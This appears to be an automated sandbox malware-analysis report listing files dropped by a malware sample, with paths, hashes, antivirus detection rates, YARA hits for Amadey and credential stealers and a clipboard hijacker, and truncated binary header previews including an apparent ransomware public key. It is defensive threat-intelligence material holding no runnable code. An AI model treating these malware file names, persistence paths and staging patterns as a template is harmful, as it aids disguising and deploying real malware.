                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L...G..c.................~..."&.....YN............@...........................(.................................................d.....&.......................(..... ...............................P1..@............................................text....}.......~.................. ..`.data...DX$.........................@....rsrc.........&.....................@..@.reloc...3....(..4...4..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):802304
                                                                                                                            Entropy (8bit):7.685061735084475
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:6nRTyItqh7DLUjjuiX+tR+WoXeAWG1qzz5E:8TZta/Uja7siAW
                                                                                                                            MD5:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            SHA1:1E20555089B3D2B9E34B44422C8E6C3061E68F0E
                                                                                                                            SHA-256:D34D06CCD3BA7877664E4769FF708D7C412EE5F43A76F2A2CE962C843CC5C35B
                                                                                                                            SHA-512:A05299352297160D62FB91A75EC7D30E8C00CDAB97BFEF112429B0CED6041A3E6FB232686FF6A4080E9C98797B4D224792C6339600084DED4B12B0595575EDC0
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L....4.a.................N...(&.....YN.......`....@...........................0..............................................Q..d............................`0..... ...............................P1..@............................................text...JL.......N.................. ..`.data...DX$..`.......R..............@....rsrc................p..............@..@.reloc...8...`0..:..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):809984
                                                                                                                            Entropy (8bit):7.646586492015294
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:6aBz+gzWrFGCkY9J22msYEy85LJxg1YSlniLs4CEhtYdGJ+CejE:/z+gzW7Z22byv1YSsA4CpdGJ+I
                                                                                                                            MD5:15BC205C2CAF7196EE2267087C3B2BB8
                                                                                                                            SHA1:0E1EE7E4CCAFD5A62D6B2B3A9369709EAB0E1F0B
                                                                                                                            SHA-256:FDEE1B99A95C5DFB4A256CDB7E43CE3F21A5D2C2977CE252AAFFA77A9E017DDF
                                                                                                                            SHA-512:DBFD1C50D16F21084B542A2ABD2B35F6489D30B55E9B5B8DC9014BCC9C4AE8A24DF08A659B28EAD862291BC65107A34C0CDA8CAD08A354E92FA23138D21F662C
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...........PE..L.....b.................L...H&.....9N.......`....@...........................0.....4.......................................XO..d.......0.....................0..... ................................1..@............................................text....J.......L.................. ..`.data...DX$..`.......P..............@....rsrc...0............n..............@..@.reloc.."8....0..:..."..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):802304
                                                                                                                            Entropy (8bit):7.685061735084475
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:6nRTyItqh7DLUjjuiX+tR+WoXeAWG1qzz5E:8TZta/Uja7siAW
                                                                                                                            MD5:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            SHA1:1E20555089B3D2B9E34B44422C8E6C3061E68F0E
                                                                                                                            SHA-256:D34D06CCD3BA7877664E4769FF708D7C412EE5F43A76F2A2CE962C843CC5C35B
                                                                                                                            SHA-512:A05299352297160D62FB91A75EC7D30E8C00CDAB97BFEF112429B0CED6041A3E6FB232686FF6A4080E9C98797B4D224792C6339600084DED4B12B0595575EDC0
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L....4.a.................N...(&.....YN.......`....@...........................0..............................................Q..d............................`0..... ...............................P1..@............................................text...JL.......N.................. ..`.data...DX$..`.......R..............@....rsrc................p..............@..@.reloc...8...`0..:..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):802304
                                                                                                                            Entropy (8bit):7.685061735084475
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:6nRTyItqh7DLUjjuiX+tR+WoXeAWG1qzz5E:8TZta/Uja7siAW
                                                                                                                            MD5:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            SHA1:1E20555089B3D2B9E34B44422C8E6C3061E68F0E
                                                                                                                            SHA-256:D34D06CCD3BA7877664E4769FF708D7C412EE5F43A76F2A2CE962C843CC5C35B
                                                                                                                            SHA-512:A05299352297160D62FB91A75EC7D30E8C00CDAB97BFEF112429B0CED6041A3E6FB232686FF6A4080E9C98797B4D224792C6339600084DED4B12B0595575EDC0
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L....4.a.................N...(&.....YN.......`....@...........................0..............................................Q..d............................`0..... ...............................P1..@............................................text...JL.......N.................. ..`.data...DX$..`.......R..............@....rsrc................p..............@..@.reloc...8...`0..:..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288768
                                                                                                                            Entropy (8bit):6.584915706285476
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:tiaWGvA5BMvdYuAJ2qiGD0swth9Ewaf/s7htn5gYTtic7:t4GvAMdj40th7a3s7SYTtic
                                                                                                                            MD5:7A8E3D000FBA0F5765B98E2D78EB9D12
                                                                                                                            SHA1:2DFF944F970FAEF5C6FA92AC8FBE82C9251553F3
                                                                                                                            SHA-256:13744BE5698FFDDC96D55415FDEEBDE4921ED199B4174251D83F1FD5B5A05C66
                                                                                                                            SHA-512:1D56B0DD129D7A1C1E76B110F9CEE4C63D2F021BCDCACA53CD780CC5E6B6CAFD6CEBC70FB62198910CAE2E4E9EA083216611923C72A4120FCC30CA3894A058DA
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L...G..c.................~..."&.....YN............@...........................(.................................................d.....&.......................(..... ...............................P1..@............................................text....}.......~.................. ..`.data...DX$.........................@....rsrc.........&.....................@..@.reloc...3....(..4...4..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\3C54.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):255488
                                                                                                                            Entropy (8bit):6.3672540076726225
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:W9ynaiEzdOYqdjqqMth9iiry6Q2IbiiRWu1i5bDuPmyye:yWcmAh9ix2r1u1ile
                                                                                                                            MD5:08240E71429B32855B418A4ACF0E38EC
                                                                                                                            SHA1:B180ACE2EA6815775D29785C985B576DC21B76B5
                                                                                                                            SHA-256:A41B4591C7351562ED9125DA2C93DB246E87E05198D2EC0951733D1919E119D8
                                                                                                                            SHA-512:69FA8CAE9BF69BCC498CFD7AF08FCDFD299440BA0DD679835CC8EA14F07B0346F965F88350A5261F2312E046B0DD498B8453D647B5F023762E4265FFA47472BF
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z....D...D...D...E...D...EG..D...E...D2..E...D2..E...D2..E...D...E...D...DE..D|..E...D|..D...D|..E...DRich...D........PE..L....T.c............................u.............@..........................@............@.................................0....................................*..0p..p...................Dq.......p..@...............d............................text............................... ..`.rdata..............................@..@.data....D..........................@....rsrc...............................@..@.reloc...*.......,..................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\3C54.exe
                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):3890176
                                                                                                                            Entropy (8bit):7.902408557753204
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:8Pu803iSM2N7aUjjqpEbUS2qv5MQBsSY/b7KoiTFUgxylC42lVJpiU71PP:s12BEE4vqxMQzub7OTFUgxylqTiU7J
                                                                                                                            MD5:3006B49F3A30A80BB85074C279ACC7DF
                                                                                                                            SHA1:728A7A867D13AD0034C29283939D94F0DF6C19DF
                                                                                                                            SHA-256:F283B4C0AD4A902E1CB64201742CA4C5118F275E7B911A7DAFDA1EF01B825280
                                                                                                                            SHA-512:E8FC5791892D7F08AF5A33462A11D39D29B5E86A62CBF135B12E71F2FCAAA48D40D5E3238F64E17A2F126BCFB9D70553A02D30DC60A89F1089B2C1E7465105DD
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Bu.c...............&.....X;................@..............................;.....!.;...`... ...............................................8.......9.......8...............;...............................8.(...................D.8..............................text...............................`..`.data.....7.......7.................@....rdata........8.......8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........9.......8.............@....rsrc.........9.......8.............@....reloc........;......Z;.............@..B........................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\3C54.exe
                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):973312
                                                                                                                            Entropy (8bit):4.572314384956297
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:5sJc/3ljJhGbZmEWh6dSs/1xsBwggGLXKPXPiXuHNHGb6bH/zx/GCLW/nh/X:5sMhVhC37ggG
                                                                                                                            MD5:B4F79B3194235084A3EC85711EDFBD38
                                                                                                                            SHA1:4E5DC4085DAFBE91F8FBE3265C49A9BF6E14E43D
                                                                                                                            SHA-256:D425F18F931A8224C162FEE1804E5101BC538FE8E85C7A11D73D2BA4833ADDF4
                                                                                                                            SHA-512:B22737BB7D80FC87D40B3762EB51B921B7AE1BA6BB3BA20F0E6940F5E91EB23DDBB44C9E8F8A7F9EE332542738CBF700688629EBA17E7D04190E5DB95A019964
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4.Z...Z...Z.iu....Z.iu....Z.iu....Z...[..Z.iu....Z.iu....Z.iu....Z.iu....Z.Rich..Z.........................PE..d...\..R..........".................t5.........@............................D.............`.......... .................................................`/...p...'.................................................. ................................................text............................... ..`.data....B... ...:..................@....pdata...'...p...(...B..............@....idata...(.......*...j..............@..@.rsrc...`/.......0..................@..@.reloc..D...........................@..B................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):560
                                                                                                                            Entropy (8bit):6.009613601911672
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:YGJ68UiiMLwLR8AFq5I5WhsRtCV64uzR5W:YgJUFfFxg0cV/MI
                                                                                                                            MD5:9252E3DCF847925C8080204C028EBAE6
                                                                                                                            SHA1:498661D45D44EDED195FBB98AEC310D87BF1947E
                                                                                                                            SHA-256:2ED806DEEF0185D3983A46422B07B33CB62FF04873066C7E315876C644B4D4D8
                                                                                                                            SHA-512:71970EFCE4E86B1415696A792DC595F7E9993A587B34D4E000677B8C647A6CDE43845B7E1EBE3EE7F54D0937D2D42B4F8C3ED1C7F4468D2BF8392D57E3A625D3
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzVVm4tu5iyZw13a\/GiU0\\nV5T6yum3k8oXJuPfu\/dlDp5n6Tzk6N8vnuKpjC8lkV7xuMYgdtfQ4cWYKxUvBMa5\\nZoYlzVSlrIVedQM2wz2yOUQcOIoagsxQEzv9Of3rNy2gF4dr82Kp8IaqDk0c3hjz\\nmazDrTR\/jjRhNxY80qI9FZk8pFyou7p\/wowlaHHEiFkCdD2yrZBW1b8jmpuEPqdm\\nH+Nas4N51zRvyqkWCKO68bPnX70ZcR1zLiCfJNxJJ\/wx\/uRwZXCJW3Mhdz+bwMqd\\nhECMff6Chw2XhPIKlGEHGhqCwRLO+yfVnjAF8Tu6hWIg7qhC0tx1sT2u6Xy02NLT\\ntQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"az8OAYewNgELvwQrvCQFNi4j455hRwuI26KpqTgc"}
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):802304
                                                                                                                            Entropy (8bit):7.685061735084475
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:6nRTyItqh7DLUjjuiX+tR+WoXeAWG1qzz5E:8TZta/Uja7siAW
                                                                                                                            MD5:6944FCA258A9009F9D3B7212CDB4874D
                                                                                                                            SHA1:1E20555089B3D2B9E34B44422C8E6C3061E68F0E
                                                                                                                            SHA-256:D34D06CCD3BA7877664E4769FF708D7C412EE5F43A76F2A2CE962C843CC5C35B
                                                                                                                            SHA-512:A05299352297160D62FB91A75EC7D30E8C00CDAB97BFEF112429B0CED6041A3E6FB232686FF6A4080E9C98797B4D224792C6339600084DED4B12B0595575EDC0
                                                                                                                            Malicious:true
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L....4.a.................N...(&.....YN.......`....@...........................0..............................................Q..d............................`0..... ...............................P1..@............................................text...JL.......N.................. ..`.data...DX$..`.......R..............@....rsrc................p..............@..@.reloc...8...`0..:..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):162
                                                                                                                            Entropy (8bit):4.621829903792328
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
                                                                                                                            MD5:1B7C22A214949975556626D7217E9A39
                                                                                                                            SHA1:D01C97E2944166ED23E47E4A62FF471AB8FA031F
                                                                                                                            SHA-256:340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
                                                                                                                            SHA-512:BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1074176
                                                                                                                            Entropy (8bit):6.478034514486552
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:YVaH8jJPWhQnZzrZ+7xr1rZfVlTxd43v7t5m:2AhQnZzrZSxxZfVlUD
                                                                                                                            MD5:16FD83A682162D6EDC119DC12C9990DC
                                                                                                                            SHA1:4B5F38C78C8E5F1333989DA0912E945335F82C95
                                                                                                                            SHA-256:36BE2F6CCCDF3EDC709E7DABCBE529D4F6390D3C624BA10FB471BD05D36060C8
                                                                                                                            SHA-512:5AF414C95DB738D0A65FDD67F2FF3923C451EE68856237F55626586AAC14EFE62288F5B8D74A5FBF2EABA9E6A1689CEA89B856212A597AB12A3A4B0097E3F3A5
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, Author: Joe Security
                                                                                                                            • Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, Author: kevoreilly
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............sO..sO..sO..wN..sO..pN..sO..vNe.sO..vN..sO..wN..sO..pN..sO..rN..sO..rOi.sON.zN..sON.sN..sON..O..sON.qN..sORich..sO................PE..d....T.c.........." ................H.....................................................`.........................................`{..X....{..................................h.......p...........................p................................................text............................... ..`.rdata..............................@..@.data....o.......6...|..............@....pdata..............................@..@_RDATA...............J..............@..@.rsrc................L..............@..@.reloc..h............N..............@..B................................................................................................................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):9728
                                                                                                                            Entropy (8bit):5.3362059272001
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:9UEc8b6H1LE+4LoGgMatAJ2lzUw317NyEpvNHhqyo:9UUE1BYoGza/D3170kiyo
                                                                                                                            MD5:9EAD10C08E72AE41921191F8DB39BC16
                                                                                                                            SHA1:ABE3BCE01CD34AFC88E2C838173F8C2BD0090AE1
                                                                                                                            SHA-256:8D7F0E6B6877BDFB9F4531AFAFD0451F7D17F0AC24E2F2427E9B4ECC5452B9F0
                                                                                                                            SHA-512:AA35DBC59A3589DF2763E76A495CE5A9E62196628B4C1D098ADD38BD7F27C49EDF93A66FB8507FB746E37EE32932DA2460E440F241ABE1A5A279ABCC1E5FFE4A
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
                                                                                                                            • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, Author: unknown
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................o......o......Rich...........................PE..L......a.....................................0....@..........................`............@..................................:..<............................P..,....9..8............................................0..0............................text............................... ..`.rdata.......0......................@..@.data...`....@......................@....reloc..,....P......."..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):288768
                                                                                                                            Entropy (8bit):6.584915706285476
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:tiaWGvA5BMvdYuAJ2qiGD0swth9Ewaf/s7htn5gYTtic7:t4GvAMdj40th7a3s7SYTtic
                                                                                                                            MD5:7A8E3D000FBA0F5765B98E2D78EB9D12
                                                                                                                            SHA1:2DFF944F970FAEF5C6FA92AC8FBE82C9251553F3
                                                                                                                            SHA-256:13744BE5698FFDDC96D55415FDEEBDE4921ED199B4174251D83F1FD5B5A05C66
                                                                                                                            SHA-512:1D56B0DD129D7A1C1E76B110F9CEE4C63D2F021BCDCACA53CD780CC5E6B6CAFD6CEBC70FB62198910CAE2E4E9EA083216611923C72A4120FCC30CA3894A058DA
                                                                                                                            Malicious:true
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L...G..c.................~..."&.....YN............@...........................(.................................................d.....&.......................(..... ...............................P1..@............................................text....}.......~.................. ..`.data...DX$.........................@....rsrc.........&.....................@..@.reloc...3....(..4...4..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):289280
                                                                                                                            Entropy (8bit):6.585305891932375
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:1nsNTcFBW0dKNogILXJ6WPLpjHysySMX3YpCUtn5grTtiFmAevZ:qNTcddpgInDtHMn3frTti9
                                                                                                                            MD5:3D8207E1CE6762FF10DB118BEE3BD99B
                                                                                                                            SHA1:82A02D6E00DE00074B48BA3CC76424A6EFE3E6AB
                                                                                                                            SHA-256:C38267836DDE53953018C962A372E8E74153F97932418B682FC653ECFCB7BECE
                                                                                                                            SHA-512:CA346B7FCD302A5D4AFBDCEB8D4A50F28D14068D9A72AD9960F647F19810D4936D0514A9ECD3FB2A14B87E7F82C0DF33AEEB02BFA64BEB394F5EB46FA6810D1A
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.....|...c...|...c...|...c...Richb...................PE..L...e..c....................."&.....YN............@...........................(.................................................d.....&.......................(..... ...............................P1..@............................................text...z........................... ..`.data...DX$.........................@....rsrc.........&.....................@..@.reloc...3....(..4...6..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.849718478245105
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:ekjXaeaUX6GJpf7xkJGL+bwCFCCqdz2cQK575neVO57K9JgiJCFr4pBf/n0Xa/Q1:ewXaI6SEsCcCJcdAIEJgiJAG90Xa/UD
                                                                                                                            MD5:80B888723A2D18278EAD53B06FDCCEBD
                                                                                                                            SHA1:7EE1E787B9DC77807E9468BD108FC3BBB39ED20F
                                                                                                                            SHA-256:4D67D7BE5A6B7B83A56F794E7AB1947E1B6EFBE5C3DFBFB1360C93EB723CA6E6
                                                                                                                            SHA-512:2E0951A532C2A7C37F347BAC627215ACAE10BC737C1136D87818134ADC8055AB809307039698F48B08F64FE5C83B41BA9A5B3553A88ABD92423D138D21A4696B
                                                                                                                            Malicious:true
                                                                                                                            Reputation:unknown
                                                                                                                            Preview:CZQKST.^$.....S..w[.W.&.s....k...d.1G.s..u..W....&......O;...e....fS....Pvt..D...YA;..V..t.#..}../kA\U.Ux}.v)...f..q.\$..a.X.9K..0....j.U&D...B...r.z.p.......v..o..]..@..g.p../.=.Z.!].T.)K....}v......"9....4..!_^H.4.{.O,.."..;K..ZC.Y|.W\...Q...=....<.z....;!... y.X...S...h.hg......&.......w.[...'.x....<...)....v.ScV}^60..V(=F...*....s?..>.....[...JM..\.(.Z.t.....$..Fy...h4..Yj......\...4....i..3iT.}...P/#.r.(l....-0.bl...=..S..r....M.:\.zA*..k..)W..j..0C..)..'.........I.k ........).%....f...n.}...L.......a...#84.&..U. @.t~..../..;.^.n..i.+.....I>.;...M.T..\....mzE@.l.YNC...N3.r.#Zh..I.&.;..]E.e.A.(M .e...&.^k,W../.zk'.l?....s.#qEH..r.....1[..~.>ke'Y....BE.....M....o!#.eC..f.V[i...i|{."..]...S.......{?l.c=.P...".?f..."7.]..;.[...8..1G4.z...v.W..p.V(....Y..'.+..,..D{%<....\....ngnc..k..$..<..C...mu.%!./..E...d...?}E.....|..~...H..>...1S)RU..A.(.~..B..9t*.j..I....K..b....T.#..T.......F....^I8.F...R......]...b..e.Q.._.m.G.W8tkB.c.lQ..$...bG
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\D804.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1360
                                                                                                                            Entropy (8bit):7.849718478245105
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:ekjXaeaUX6GJpf7xkJGL+bwCFCCqdz2cQK575neVO57K9JgiJCFr4pBf/n0Xa/Q1:ewXaI6SEsCcCJcdAIEJgiJAG90Xa/UD
                                                                                                                            MD5:80B888723A2D18278EAD53B06FDCCEBD
                                                                                                                            SHA1:7EE1E787B9DC77807E9468BD108FC3BBB39ED20F
                                                                                                                            SHA-256:4D67D7BE5A6B7B83A56F794E7AB1947E1B6EFBE5C3DFBFB1360C93EB723CA6E6
                                                                                                                            SHA-512:2E0951A532C2A7C37F347BAC627215ACAE10BC737C1136D87818134ADC8055AB809307039698F48B08F64FE5C83B41BA9A5B3553A88ABD92423D138D21A4696B
                                                                                                                            Malicious:false
                                                                                                                            Reputation:unknown
